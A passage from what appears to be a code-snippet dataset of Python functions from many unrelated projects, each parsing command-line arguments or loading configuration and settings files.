bool(get('cache'))\n if get('verbose')!=None:\n self.temp_configuration.verbosenessLevel = get('verbose')\n if get('noninteractive')!=None:\n self.temp_configuration.interactiveMode = \\\n not bool(get('noninteractive'))\n if get('workflowinfo') != None:\n self.temp_configuration.workflowInfo = str(get('workflowinfo'))\n if get('dumpcells') != None:\n self.temp_configuration.spreadsheetDumpCells = get('dumpcells')\n if get('pdf') != None:\n self.temp_configuration.spreadsheetDumpPDF = get('pdf')\n if get('workflowgraph') != None:\n self.temp_configuration.workflowGraph = str(get('workflowgraph'))\n if get('evolutiongraph') != None:\n self.temp_configuration.evolutionGraph = str(get('evolutiongraph'))\n if get('executeworkflows') != None:\n self.temp_configuration.executeWorkflows = \\\n bool(get('executeworkflows'))\n if get('showspreadsheetonly') != None:\n self.temp_configuration.showSpreadsheetOnly = \\\n bool(get('showspreadsheetonly'))\n # asking to show only the spreadsheet will force the workflows to\n # be executed\n if get('reviewmode') != None:\n self.temp_configuration.reviewMode = bool(get('reviewmode'))\n\n if self.temp_configuration.showSpreadsheetOnly and not self.temp_configuration.reviewMode:\n self.temp_configuration.executeWorkflows = True\n \n self.temp_db_options = InstanceObject(host=get('host'),\n port=get('port'),\n db=get('db'),\n user=get('user'),\n parameters=get('parameters')\n )\n if get('nologger')!=None:\n self.temp_configuration.nologger = bool(get('nologger'))\n if get('quickstart') != None:\n self.temp_configuration.staticRegistry = str(get('quickstart'))\n if get('detachHistoryView')!= None:\n self.temp_configuration.detachHistoryView = bool(get('detachHistoryView'))\n self.input = command_line.CommandLineParser().positional_arguments()", "def loadUserSettings(script=None, inputEvent=None):\n\n global _userSettings\n\n # Shutdown the output drivers and give them a chance to die.\n\n # Only exit the D-Bus server if we're in an environment where there \n # is a D-Bus session bus already running. This helps prevent nastiness\n # on the login screen.\n #\n if settings.useDBus:\n dbusserver.shutdown()\n\n httpserver.shutdown()\n speech.shutdown()\n braille.shutdown()\n mag.shutdown()\n\n if _currentPresentationManager >= 0:\n _PRESENTATION_MANAGERS[_currentPresentationManager].deactivate()\n\n time.sleep(1)\n\n reloaded = False\n if _userSettings:\n try:\n reload(_userSettings)\n reloaded = True\n except ImportError:\n debug.printException(debug.LEVEL_FINEST)\n except:\n debug.printException(debug.LEVEL_SEVERE)\n else:\n try:\n _userSettings = __import__(\"user-settings\")\n except ImportError:\n debug.printException(debug.LEVEL_FINEST)\n except:\n debug.printException(debug.LEVEL_SEVERE)\n\n # If any settings were added to the command line, they take\n # precedence over everything else.\n #\n for key in _commandLineSettings:\n setattr(settings, key, _commandLineSettings[key])\n\n if settings.enableSpeech:\n try:\n speech.init()\n if reloaded:\n # Translators: there is a keystroke to reload the user\n # preferences. This is a spoken prompt to let the user\n # know when the preferences has been reloaded.\n #\n speech.speak(_(\"Orca user settings reloaded.\"))\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Speech module has been initialized.\")\n except:\n debug.printException(debug.LEVEL_SEVERE)\n debug.println(debug.LEVEL_SEVERE,\n \"Could not initialize connection to speech.\")\n else:\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Speech module has NOT been initialized.\")\n\n if settings.enableBraille:\n try:\n braille.init(_processBrailleEvent, settings.tty)\n except:\n debug.printException(debug.LEVEL_WARNING)\n debug.println(debug.LEVEL_WARNING,\n \"Could not initialize connection to braille.\")\n\n if settings.enableMagnifier:\n try:\n mag.init()\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Magnification module has been initialized.\")\n except:\n debug.printException(debug.LEVEL_SEVERE)\n debug.println(debug.LEVEL_SEVERE,\n \"Could not initialize connection to magnifier.\")\n else:\n debug.println(debug.LEVEL_CONFIGURATION,\n \"Magnification module has NOT been initialized.\")\n\n # I'm not sure where else this should go. But it doesn't really look\n # right here.\n try:\n mouse_review.mouse_reviewer.toggle(on=settings.enableMouseReview)\n except NameError:\n pass\n\n # We don't want the Caps_Lock modifier to act as a locking\n # modifier if it used as the Orca modifier key. In addition, if\n # the KP_Insert key is used as the Orca modifier key, we want to\n # make sure we clear any other keysyms that might be in use on\n # that key since we won't be able to detect them as being the Orca\n # modifier key. For example, KP_Insert produces \"KP_Insert\" when\n # pressed by itself, but Shift+KP_Insert produces \"0\".\n #\n # The original values are saved/reset in the orca shell script.\n #\n # [[[TODO: WDW - we probably should just to a 'xmodmap -e \"%s = %s\"'\n # for all of the orcaModifierKeys, but saving/restoring the values\n # becomes a little more difficult. If we could assume a writeable\n # filesystem (we cannot), we could do a 'xmodmap -pke > /tmp/foo'\n # to save the keymap and a 'xmodmap /tmp/foo' to restore it.\n # For now, we'll just look at the Orca modifier keys we support\n # (Caps Lock, KP_Insert, and Insert).]]]\n #\n for keyName in settings.orcaModifierKeys:\n if keyName == \"Caps_Lock\":\n os.system('xmodmap -e \"clear Lock\"')\n if keyName in [\"Caps_Lock\", \"KP_Insert\", \"Insert\"]:\n command = 'xmodmap -e \"keysym %s = %s\"' % (keyName, keyName)\n os.system(command)\n\n if _currentPresentationManager >= 0:\n _PRESENTATION_MANAGERS[_currentPresentationManager].activate()\n\n showMainWindowGUI()\n\n # Only start the D-Bus server if we're in an environment where there \n # is a D-Bus session bus already running. This helps prevent nastiness\n # on the login screen.\n #\n if settings.useDBus:\n dbusserver.init()\n httpserver.init()\n\n return True", "def ReadArguments():\n\n args = ParseArguments()\n\n logging.info('Command line arguments...')\n for arg in vars(args):\n logging.info(str(arg) + ': ' + str(getattr(args, arg)))\n logging.info('')\n\n IsTest(args)\n ProcessCacheSize(args)\n ProcessLineSize(args)\n ProcessMulti(args)\n ProcessMemPattern(args)\n ProcessMemFile(args)", "def read_command_line():\n\n parser = argparse.ArgumentParser(\n description='Mount an S3 bucket as a read-only filesystem')\n\n # All arguments must default to None so that they can be filtered\n # out of the returned dictionary; otherwise, the argument defaults\n # will override settings from the configuration file.\n parser.add_argument('mount-point',\n help='where to mount the bucket')\n parser.add_argument('--bucket', dest='bucket',\n help='S3 bucket to mount')\n parser.add_argument('--access-key', dest='access-key',\n help='access key for the bucket')\n parser.add_argument('--secret-key', dest='secret-key',\n help='secret key for the bucket')\n\n parser.add_argument('--config-file', dest='config-file',\n default='~/.s3viewport.yaml',\n help='path to the configuration file')\n\n parser.add_argument('--no-input', dest='no-input',\n action='store_true', default=None,\n help=\"don't prompt for missing information\")\n parser.add_argument('--foreground', dest='foreground',\n action='store_true', default=None,\n help='run filesystem server in the foreground')\n\n # TODO: Describe configuration file format\n\n args = parser.parse_args()\n return filter_dict(vars(args), lambda k, v: v is not None)", "def _read_settings():\n parser = argparse.ArgumentParser(\n description='extract molecular fragments')\n parser.add_argument('-i', type=str, dest='input',\n help='input JSON file', required=True)\n parser.add_argument('-o', type=str, dest='output',\n help='template to JSON output file, the {} is '\n 'used as placeholder for index',\n required=True)\n parser.add_argument('-s', type=int, dest='size',\n help='number of object per output file', required=True)\n args = vars(parser.parse_args())\n #\n output = {\n 'source': args['input'],\n 'output': args['output'],\n 'size': args['size']\n }\n return output", "def _parse_config(self, config=None):\r\n # TODO: Load user configuration from the file\r\n # self._current_user_name = get_from_conf(\r\n # config, \"user_name\", self._current_user_name\r\n # )\r\n pass", "def read_opts(self):\n\n # process any optlist_ options\n self.valid_opts.check_special_opts(sys.argv)\n\n # ------------------------------------------------------------\n # terminal arguments, first\n\n # cannot have len(argv) <= 1 here, but be consistent with other progs\n if len(sys.argv) <= 1 or '-help' in sys.argv:\n print g_help_string\n return 0\n\n if '-hist' in sys.argv:\n print g_history\n return 0\n\n if '-ver' in sys.argv:\n print g_version\n return 0\n\n if '-show_valid_opts' in sys.argv:\n self.valid_opts.show('', 1)\n return 0\n\n # ------------------------------------------------------------\n # read all user options\n\n self.user_opts = self.OL.read_options(sys.argv, self.valid_opts)\n if not self.user_opts: return 1 # error condition\n\n return None # normal completion", "def load_settings(self):\n self.settings = db.get_settings()\n if len(self.settings) < 2:\n while(True):\n consumer_key = raw_input(\"Enter your consumer key\")\n consumer_secret = raw_input(\"Enter your consumer_secret\")\n if len(consumer_key) > 5 and len(consumer_secret) > 5:\n db.add_settings(consumer_key, consumer_secret)\n break", "def process_args(filepath=None):\n if filepath is None:\n parser = argparse.ArgumentParser()\n parser.add_argument('-S', '--settings', dest='settings',\n metavar='FILE', default='settings.json',\n help='Settings file')\n parser.add_argument('unittest_args', nargs='*')\n options, args = parser.parse_known_args()\n filepath = options.settings\n args = [sys.argv[0]] + args\n else:\n args = sys.argv\n SETTINGS.update(DEFAULT_SETTINGS)\n with open(filepath) as infile:\n SETTINGS.update(json.load(infile))\n assert SETTINGS['USERNAME']\n assert SETTINGS['APIKEY']\n return args", "def __init__(self):\n self.options, self.args = self.get_parser().parse_args()\n\n # special case\n self.done=False\n if self.options.encode:\n print generate_password_hash(self.options.encode)\n self.doit()\n self.done=True\n return\n\n self._settings = {}\n if self.options.config:\n _file = self.options.config\n else:\n report(\"You did not pass in a config file with --config, assuming you want %s\"%self.default_file)\n _file = self.default_file\n self._settings.update(self.load(file=_file))\n\n # a few command line options are allowed to override the .ini\n if self.options.port:\n self._settings.update({'flask.port':self.options.port})\n\n # build a special section for things the user wants,\n # ie, things that have been passed into the option\n # parser but are not useful in the .ini\n self._settings.update({'user.shell' : self.options.shell and 'true' or ''})\n self._settings.update({'user.encode_password':self.options.encode})\n def prepare(k,v):\n \"\"\" allow pythonic comments in the .ini files,\n and strip any trailing whitespace.\n\n TODO: move this to ConfigParser subclass.\n \"\"\"\n self._settings[k]=v.strip()\n if '#' in v:\n self._settings[k]=v[:v.find('#')]\n\n [ prepare(k,v) for k,v in self._settings.items() ]\n\n self.doit()", "def initialize():\n # Ensure user config exists\n install(CONFIG_PATH)\n\n # Load preferences into memory\n get_config()", "def setup(parser):\n global debug\n global config\n global file_list\n global job_sets\n global from_saved_state\n\n args = parser.parse_args()\n\n if args.debug:\n debug = True\n print_message('Running in debug mode', 'ok')\n\n # read through the config file and setup the config dict\n config = {}\n if not args.config:\n parser.print_help()\n sys.exit()\n else:\n try:\n confParse = ConfigParser.ConfigParser()\n confParse.read(args.config)\n for section in confParse.sections():\n config[section] = {}\n for option in confParse.options(section):\n opt = confParse.get(section, option)\n if not opt:\n if 'pass' in option and not args.no_monitor:\n opt = getpass('>> ' + option + ': ')\n else:\n opt = raw_input('>> ' + option + ': ')\n if opt.startswith('[') or opt.startswith('{'):\n opt = json.loads(opt)\n config[section][option] = opt\n except Exception as e:\n msg = 'Unable to read config file, is it properly formatted json?'\n print_message(msg)\n print_debug(e)\n return -1\n\n if args.no_ui:\n config['global']['ui'] = False\n else:\n debug = False\n config['global']['ui'] = True\n\n if args.dry_run:\n config['global']['dry_run'] = True\n else:\n config['global']['dry_run'] = False\n\n if args.no_cleanup:\n config['global']['no_cleanup'] = True\n else:\n config['global']['no_cleanup'] = False\n\n if args.no_monitor:\n config['global']['no_monitor'] = True\n print \"Turning off remote monitoring\"\n else:\n config['global']['no_monitor'] = False\n \n if args.size:\n config['transfer']['size'] = args.size\n else:\n config['transfer']['size'] = 100\n \n if args.viewer:\n print 'Turning on output_viewer mode'\n config['global']['viewer'] = True\n else:\n config['global']['viewer'] = False\n\n # setup config for file type directories\n for key, val in config.get('global').get('output_patterns').items():\n new_dir = os.path.join(\n config['global']['data_cache_path'],\n key)\n if not os.path.exists(new_dir):\n os.makedirs(new_dir)\n if val == 'mpaso.hist.am.timeSeriesStatsMonthly':\n config['global']['mpas_dir'] = new_dir\n elif val == 'mpascice.hist.am.timeSeriesStatsMonthly':\n config['global']['mpas_cice_dir'] = new_dir\n elif val == 'cam.h0':\n config['global']['atm_dir'] = new_dir\n elif val == 'mpaso.rst.0':\n config['global']['mpas_rst_dir'] = new_dir\n elif val == 'rpointer':\n config['global']['rpt_dir'] = new_dir\n elif val == 'mpas-o_in':\n config['global']['mpas_o-in_dir'] = new_dir\n elif val == 'mpas-cice_in':\n config['global']['mpas_cice-in_dir'] = new_dir\n elif 'stream' in val:\n config['global']['streams_dir'] = new_dir\n\n if not os.path.exists(config['global']['output_path']):\n os.makedirs(config['global']['output_path'])\n if not os.path.exists(config['global']['data_cache_path']):\n os.makedirs(config['global']['data_cache_path'])\n\n # setup run_scipts_path\n config['global']['run_scripts_path'] = os.path.join(\n config['global']['output_path'],\n 'run_scripts')\n # setup tmp_path\n config['global']['tmp_path'] = os.path.join(\n config['global']['output_path'],\n 'tmp')\n\n # setup logging\n if args.log:\n log_path = args.log\n else:\n log_path = os.path.join(\n config.get('global').get('output_path'),\n 'workflow.log')\n logging.basicConfig(\n format='%(asctime)s:%(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n filename=log_path,\n filemode='w',\n level=logging.DEBUG)\n\n endpoints = [config['transfer']['source_endpoint'], config['transfer']['destination_endpoint']]\n if not setup_globus(endpoints):\n return -1\n print 'Globus setup complete'\n return config", "def parse_config(cmdline_opts):\n cmdline_opts.add_argument(\n '-p', '--port', help='Enter port number', default=8001)\n cmdline_opts.add_argument(\n '--host', help='Enter host name', default='localhost')\n cmdline_opts.add_argument(\n '-c', '--config', help='Enter config file', default='config.json')", "def read_arguments(argv):\n\tif argv[0] in ('1', '2'):\n\t\tconos_config['endpoint'] = endpoint[argv[0]]\n\telse:\n\t\tusage()\n\n\tif argv[1] in ('dev', 'test', 'int', 'prod'):\n\t\tconos_config['environment'] = argv[1]\n\t\tconos_config['sts_url'] = eval(argv[1] + '_sts_url')\n\t\tconos_config['aicuu_url'] = eval(argv[1] + '_aicuu_url')\n\telse:\n\t\tusage()\n\n\tif len(argv) == 6:\n\t\tconos_config['number_threads'] = '1'\n\telse:\n\t\tif argv[6] in ('1', '2', '3', '4', '5', '6', '7', '8'):\n\t\t\tconos_config['number_threads'] = argv[6]\n\t\telse:\n\t\t\tusage()\n\n\tconos_config['client_id'] = argv[2]\n\tconos_config['client_secret'] = argv[3]\n\tconos_config['input_file'] = argv[4]\n\tconos_config['output_file'] = argv[5]", "def init():\n try:\n config = configparser.ConfigParser()\n # look for username.config on both Windows (USERNAME) and Linux (USER)\n if os.name == \"nt\":\n username = os.environ['USERNAME']\n else:\n username = os.environ['USER']\n config_file = username + \".config\"\n if not os.path.isfile(config_file):\n logging.error(\"Configuration file \" + config_file + \" not found.\")\n sys.exit()\n config.read(config_file)\n # database\n global DB_HOST, DB_PORT, DB_NAME, DB_USER, DB_PASSWORD\n DB_HOST = config[\"DATABASE\"][\"db_host\"] if (\"db_host\" in config[\"DATABASE\"]) else None\n DB_PORT = config[\"DATABASE\"][\"db_port\"]\n DB_NAME = config[\"DATABASE\"][\"db_name\"]\n DB_USER = config[\"DATABASE\"][\"db_user\"]\n DB_PASSWORD = config[\"DATABASE\"][\"db_password\"]\n except Exception:\n logger.exception(\"Failed to read config file properly\")\n raise", "def read_config():\n parser = OptionParser()\n parser.add_option(\"-c\", \"--config\", dest=\"conf_path\", type=\"string\", help=\"config file path\")\n (options, args) = parser.parse_args()\n\n config.readfp(open(options.conf_path)) # \"threadbot.cfg\"\n subreddit = config.get(\"threadbot\", \"subreddit\")\n username = config.get(\"threadbot\", \"username\")\n password = config.get(\"threadbot\", \"password\")\n\n return subreddit, username, password", "def cli():\n config, auth, execute_now = read_command_line_arguments()\n main(config, auth, execute_now)", "def setup(self):\n # Set bashrc file\n self._bashrc()\n\n # Return if not running script as root user\n if self.running_as_root is False:\n return\n\n # Return if user prompted doesn't exist\n if self.infoset_user_exists is False:\n return\n\n # Set file permissions\n self._file_permissions()\n\n # Setup systemd\n self._systemd()", "def read_settings(self):\n config = ConfigParser.SafeConfigParser()\n config.read(os.path.dirname(os.path.realpath(__file__)) + '/linode.ini')\n\n # Cache related\n cache_path = config.get('linode', 'cache_path')\n self.cache_path_cache = cache_path + \"/ansible-linode.cache\"\n self.cache_path_index = cache_path + \"/ansible-linode.index\"\n self.cache_max_age = config.getint('linode', 'cache_max_age')", "def parse_user_args():\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-j\", \"--json_fname\", help=\"Enter the path to the json \"\n \"filename containing\"\n \"all the paths to the \"\n \"test_collection\", required=True)\n\n ap.add_argument(\"-m\", \"--method\", help=\"Enter the type of baseline run, \"\n \"bm_25, tf_idf or jm_qlm\",\n required=True)\n\n return vars(ap.parse_args())", "def read_settings(self):\n config = ConfigParser.ConfigParser()\n config_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'digital_ocean.ini')\n config.read(config_path)\n\n # Credentials\n if config.has_option('digital_ocean', 'api_token'):\n self.api_token = config.get('digital_ocean', 'api_token')\n\n # Cache related\n if config.has_option('digital_ocean', 'cache_path'):\n self.cache_path = config.get('digital_ocean', 'cache_path')\n if config.has_option('digital_ocean', 'cache_max_age'):\n self.cache_max_age = config.getint('digital_ocean', 'cache_max_age')\n\n # Private IP Address\n if config.has_option('digital_ocean', 'use_private_network'):\n self.use_private_network = config.getboolean('digital_ocean', 'use_private_network')\n\n # Group variables\n if config.has_option('digital_ocean', 'group_variables'):\n self.group_variables = ast.literal_eval(config.get('digital_ocean', 'group_variables'))", "def process_command_line():\n global dry_run, username, release_path, skip_upload\n\n # Get command-line options\n try:\n opts, args = getopt.gnu_getopt(sys.argv[1:], options, long_options)\n except getopt.GetoptError as err:\n print(str(err))\n usage()\n sys.exit(2)\n\n # Default values for flags\n username = getpass.getuser()\n\n for opt, val in opts:\n if opt in (\"-h\", \"--help\"):\n usage()\n sys.exit(0)\n\n elif opt in (\"-u\", \"--user\"):\n username = val\n\n elif opt in (\"-s\", \"--skip-upload\"):\n skip_upload = True\n\n elif opt in (\"-n\", \"--dry-run\"):\n print(\"Dry-run mode - files will not be uploaded or modified\")\n dry_run = True\n\n # Mandatory parameters\n # (none)\n\n # Change to release directory, current if not specified\n try:\n release_path = args[0]\n os.chdir(release_path)\n except IndexError:\n release_path = os.getcwd()", "def GetArgs():\n \n UserArgs = {}\n UserArgs['help'] = False\n UserArgs['RsodFileName'] = \"\"\n UserArgs['BiosPathX64'] = \"\"\n\n for i in range(1,len(sys.argv)):\n if sys.argv[i].lower() == \"-help\" : UserArgs[\"help\"] = True\n elif sys.argv[i].lower() == \"-h\" : UserArgs[\"help\"] = True\n elif \"-rsodfile=\" in sys.argv[i].lower() : UserArgs['RsodFileName'] = sys.argv[i].split ('=', 1)[1]\n elif \"-biospathx64=\" in sys.argv[i].lower() : UserArgs['BiosPathX64'] = sys.argv[i].split ('=', 1)[1]\n\n return UserArgs", "def autostart_read_options(self,options_file):\n config=ConfigParser.ConfigParser()\n config.read(options_file)\n return config", "def read(self, sys):\n\n # if no options are set, print help\n if len(sys.argv) == 1:\n sys.argv.append('-h')\n\n # make sure parameter file is processed first\n # so that all options on the command line\n # have precedence\n if any(['@' in xx[0] for xx in sys.argv]):\n paridx = [xx[0] for xx in sys.argv].index('@')\n parfile = sys.argv.pop(paridx)\n sys.argv.insert(1, parfile)\n\n opt = self.parser.parse_args()\n\n # transform some parameters to proper types\n try:\n if 1 != opt.beamscaling:\n opt.beamscaling = [float(xx)\n for xx\n in opt.beamscaling.split(',')]\n\n if opt.feed:\n opt.feed = self.parse_range(opt.feed)\n\n if opt.pol:\n opt.pol = self.parse_range(opt.pol)\n\n if opt.window:\n opt.window = self.parse_range(opt.window)\n\n if opt.mapscans:\n opt.mapscans = self.parse_range(opt.mapscans)\n\n if opt.refscans:\n opt.refscans = self.parse_range(opt.refscans)\n\n except ValueError:\n print('ERROR: there is a malformed parameter option')\n print(' please check your command line settings and try again.')\n sys.exit()\n\n opt.units = opt.units.lower()\n\n return opt", "def _generate_settings(self):\n settings = {}\n settings[\"api_client_id\"] = input(\"(OPTIONAL) Please enter your Twitch API Client ID: \") #Get API Client ID first so I can use API to get user ID\n #Save JSON\n fileIO.save_json(\"settings.json\", settings)\n name = False\n while not name: #While name not set\n name = input(\"Please enter the username of your Twitch account: \").lower()\n userID = self._get_user_id(name)\n if not userID:\n name = False\n settings[\"userid\"] = userID\n settings[\"oauth\"] = input(\"Please enter the oauth token for your Twitch account: \")\n if settings[\"oauth\"].startswith(\"oauth:\"): #If the oauth token starts with oauth:, remove it\n settings[\"oauth\"] = settings[\"oauth\"][6:]\n settings[\"error_webhook\"] = input(\"Please enter the Discord WebHook URL you would like errors to be sent to: \")\n #Save JSON\n fileIO.save_json(\"settings.json\", settings)", "def read_environment(self):\n # Setup credentials\n if os.getenv(\"DO_API_TOKEN\"):\n self.api_token = os.getenv(\"DO_API_TOKEN\")\n if os.getenv(\"DO_API_KEY\"):\n self.api_token = os.getenv(\"DO_API_KEY\")", "def parse():\n rcParams = configparser.ConfigParser(defaults=defaults())\n rcParams.read([os.path.join(os.getcwd(), 'watershed_workflowrc'),\n os.path.join(os.getcwd(), '.watershed_workflowrc'),\n os.path.join(home(), '.watershed_workflowrc')])\n return rcParams", "def init_args():\n parser = argparse.ArgumentParser(\n description=\"DeltaSherlock Client software.\")\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('-c', '--config', action='store', dest='config_file',\n default='./config.ini', help=\"Path to config file. [default: \\\n %(default)s]\")\n parser.add_argument('-d', '--daemon', action='store_true', dest='daemon',\n default=False, help=\"Run in daemon mode. [default: \\\n %(default)s]\")\n return parser.parse_args()", "def parse_args(self, argv):\n super(UpdaterDaemon, self).parse_args(argv)\n\n self.stdout = self.options.log_file\n self.stderr = self.options.error_log\n\n config = self.options.config\n if config is None:\n config = os.path.join(os.path.dirname(__file__), 'config.py')\n config = os.path.normpath(os.path.abspath(config))\n configdir, configfile = os.path.split(config)\n configfile, ext = os.path.splitext(configfile)\n if configdir not in sys.path:\n sys.path.insert(0, configdir)\n self.config = __import__(configfile)", "def setUp(self):\n self.parser = command_line.get_args()", "def read_command_line_arguments() -> Tuple[\n LocalConfig, AuthConfig, Optional[List[str]]\n]:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"config\", type=str, help=\"Path to the main config file\"\n )\n parser.add_argument(\n \"auth\", type=str, help=\"Path to the authentication config file\"\n )\n parser.add_argument(\n \"--execute-now\",\n type=str,\n help=\"\"\"A set of channel names to execute immediately, or none to\n determine automatically based on the current time.\"\"\",\n nargs=\"*\",\n choices=notification_channels.keys(),\n )\n args = parser.parse_args()\n\n config_file = read_local_config(args.config)\n auth_file = read_local_auth(args.auth)\n\n return config_file, auth_file, args.execute_now", "def parse_args_to_dict():\n locust_config_info[\"run_time\"] = args.t[0]\n locust_config_info[\"ramp_up\"] = args.r[0]\n locust_config_info[\"print_stats\"] = args.print_stats\n locust_config_info[\"summary_only\"] = args.summary_only\n locust_config_info[\"users\"] = args.u[0]\n locust_config_info[\"test_name\"] = args.f[0]\n locust_config_info[\"tsin\"] = args.tsin[0]\n print \"login style: {} l[0]: {}\".format(args.l, args.l[0])\n locust_config_info[\"login_style\"] = args.l[0]\n locust_config_info[\"request_timeout\"] = args.request_timeout[0]\n return locust_config_info", "def config_parse_file():\n global ANGELCO_EMAIL, ANGELCO_PASSWORD\n\n print(\"Parsing the config file...\")\n config = configparser.ConfigParser()\n with open('dwh.cfg') as configfile:\n config.read_file(configfile)\n\n ANGELCO_EMAIL = config.get('ANGELCO', 'EMAIL')\n ANGELCO_PASSWORD = config.get('ANGELCO', 'PASSWORD')", "def _parse_command_line_arguments():\n global config\n # Get command line args for vispy\n argnames = ['vispy-backend=', 'vispy-gl-debug', 'vispy-glir-file=',\n 'vispy-log=', 'vispy-help', 'vispy-profile=', 'vispy-cprofile',\n 'vispy-dpi=', 'vispy-audit-tests']\n try:\n opts, args = getopt.getopt(sys.argv[1:], '', argnames)\n except getopt.GetoptError:\n opts = []\n # Use them to set the config values\n for o, a in opts:\n if o.startswith('--vispy'):\n if o == '--vispy-backend':\n config['default_backend'] = a\n logger.info('vispy backend: %s', a)\n elif o == '--vispy-gl-debug':\n config['gl_debug'] = True\n elif o == '--vispy-glir-file':\n config['glir_file'] = a\n elif o == '--vispy-log':\n if ',' in a:\n verbose, match = a.split(',')\n else:\n verbose = a\n match = None\n config['logging_level'] = a\n set_log_level(verbose, match)\n elif o == '--vispy-profile':\n config['profile'] = a\n elif o == '--vispy-cprofile':\n _enable_profiling()\n elif o == '--vispy-help':\n print(VISPY_HELP)\n elif o == '--vispy-dpi':\n config['dpi'] = int(a)\n elif o == '--vispy-audit-tests':\n config['audit_tests'] = True\n else:\n logger.warning(\"Unsupported vispy flag: %s\" % o)", "def parse_command_line():\r\n\r\n parser = argparse.ArgumentParser(description='User args')\r\n parser.add_argument(\"--action\", choices=['train', 'predict', 'demo', 'test'], required=True, help=\"Choose action.\")\r\n parser.add_argument(\"--model\", choices=['vgg', 'unet', 'fpn'], required=True, help=\"Choose model.\")\r\n parser.add_argument(\"--dataset\", choices=['full', 'small'], required=True, help=\"Choose dataset.\")\r\n\r\n return parser.parse_args()", "def parse_args():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'config',\n help='Config file')\n parser.add_argument(\n '--quiet',\n '-q',\n action='store_true',\n help='do not print to console'\n )\n parser.add_argument(\n '--password',\n '-p',\n action='store_true',\n help='Set password in keyring.'\n )\n parser.add_argument(\n '--update',\n '-u',\n action='store_true',\n help='Only add transactions after last date in database.'\n )\n parser.add_argument(\n '--mark_seen',\n '-m',\n action='store_true',\n help='Mark fetched emails as seen.'\n )\n\n return parser.parse_args()", "def command_line_start(argv, program_name):\n cl_parser = argparse.ArgumentParser(description='Tinkerforge Data Logger')\n\n cl_parser.add_argument('config_file', help=\"Path to the configuration file\")\n cl_parser.add_argument('-v', action=\"store_true\", dest=\"validate\",\n help=\"Just process the validation of the configuration file\")\n\n results = cl_parser.parse_args(argv)\n\n arguments_map = {}\n arguments_map[CONSOLE_CONFIG_FILE] = results.config_file\n arguments_map[CONSOLE_VALIDATE_ONLY] = results.validate\n\n return arguments_map", "def readProperties():\n separator = \":\"\n props = {}\n \n with open('upgrade.properties') as f:\n\n for line in f:\n if separator in line:\n\n # Find the name and value by splitting the string\n name, value = line.split(separator, 1)\n\n # Assign key value pair to dict\n # strip() removes white space from the ends of strings\n props[name.strip()] = value.strip()\n\n props['JDA_HOME'] = props['JDA_HOME'].replace('-', ':')\n globs.props = props\n\n globs.UserPassDict = {}\n for user_cat in globs.CRED_DICT:\n globs.UserPassDict[props[user_cat]] = props[globs.CRED_DICT[user_cat]]", "def cmd_user(args):", "def ReadUserFlags(rules, argv):\n def Error(msg):\n print(color.Format('[ {error}Error{end} ] {msg}', {'msg': msg}))\n sys.exit(1)\n\n annotations = universe.Annotations.ExtractAnnotations(\n rules, restrict_to=['@DefineFlag'])\n defined_flags = annotations['@DefineFlag'].keys()\n try:\n p = getopt.getopt(argv, '', ['%s=' % f for f in defined_flags])\n except getopt.GetoptError as e:\n Error(str(e))\n\n if p[1]:\n Error('Undefined command arguments: %s' % p[1])\n\n sys.exit(1)\n user_flags = {k[2:]: v for k, v in p[0]}\n return user_flags", "def setup():\n\tglobal config_parser, config_file\n\tglobal prefix\n\n\tif os.path.islink(sys.argv[0]):\n\t\tlink = os.readlink(sys.argv[0])\n\n\t\tif not os.path.isabs(link):\n\t\t\tlink = os.path.join(os.path.dirname(sys.argv[0]), link)\n\n\t\tprefix = os.path.dirname(os.path.abspath(link))\n\telse:\n\t\tprefix = os.path.dirname(os.path.abspath(sys.argv[0]))\n\n\tconfig_parser = ConfigParser.ConfigParser()\n\tset_defaults()\n\n\tconfig_file = os.path.join (xdg_config_home, \"sushi\", \"nigiri\")\n\n\tif not check_config_file(config_file):\n\t\tprint \"Config file creation failed. Aborting.\"\n\t\treturn\n\n\tread_config_file()", "def ReadOptions(self, args):\n (opts, args) = getopt.getopt(args, 'vxi:p:h:', ('help',))\n for (key, val) in opts:\n if key == '-h': self.hash = val\n elif key == '-i': self.input = val\n elif key == '-v':\n self.verbose = True\n util.verbose = True\n elif key == '-x':\n self.verbose = True\n util.verbose = True\n self.extra_verbose = True\n util.extra_verbose = True\n elif key == '-p': self.profile_dest = val\n elif key == '--help':\n PrintUsage()\n sys.exit(0)\n\n if not self.input:\n if 'GRIT_INPUT' in os.environ:\n self.input = os.environ['GRIT_INPUT']\n else:\n self.input = 'resource.grd'\n\n return args", "def do_prompt(self):\n # we need _something_ in the dictionary even if the user decides to use all defaults\n # otherwise for some unknown reason it won't work\n user_in = {'__meta__': '__user_input__'}\n\n print('Please enter the information asked for in the following prompts in order to configure your deployment')\n # get the config information from the user\n for p in self.prompts:\n answer = input(p['prompt'])\n if len(answer.strip()) > 0 and 'variable' in p.keys():\n user_in[p['variable']] = answer\n\n # return the data\n return user_in", "def updateSettings(self):\n self.parser.read(self.file)\n self.showTicker = self.parser.getboolean('Settings', 'showTicker')\n self.verbose = self.parser.getboolean('Settings', 'verbose')\n self.sleepTime = self.parser.getint('Settings', 'sleeptime')\n self.saveGraph = self.parser.getboolean('Settings', 'saveGraph')\n self.graphDPI = self.parser.getint('Settings', 'graphDPI')", "def startup(self):\n self.settings = sublime.load_settings(self.settings_base)\n self.sublime_settings = sublime.load_settings(self.sublime_base)", "def setup_config(self, args=None):\n self.config_parse(args=args)", "def cli():\n prog_desc = 'Generate the default settings ini file.'\n parser = argparse.ArgumentParser(description=prog_desc)\n parser.add_argument('-o', '--outpath', help='Where to save the do file. '\n 'If not supplied, then the '\n 'file is written to STDOUT.')\n args = parser.parse_args()\n manager = SettingsManager()\n\n default_ini = manager.generate_default_ini(args.outpath)\n if default_ini:\n print(default_ini)\n else:\n print(f'Saved do file to \"{args.outpath}\"')", "def parse_arguments(self):\n \n for arg in sys.argv[1:]:\n (key, sep, value) = arg.partition(\"=\")\n if sep != \"=\":\n raise ProcessorError(\"Illegal argument '%s'\" % arg)\n self.update_data(key, value)", "def cli(ctx):\n config = get_config_data()\n\n ctx.obj = config", "def readSettingsFile():\n settingsPath = 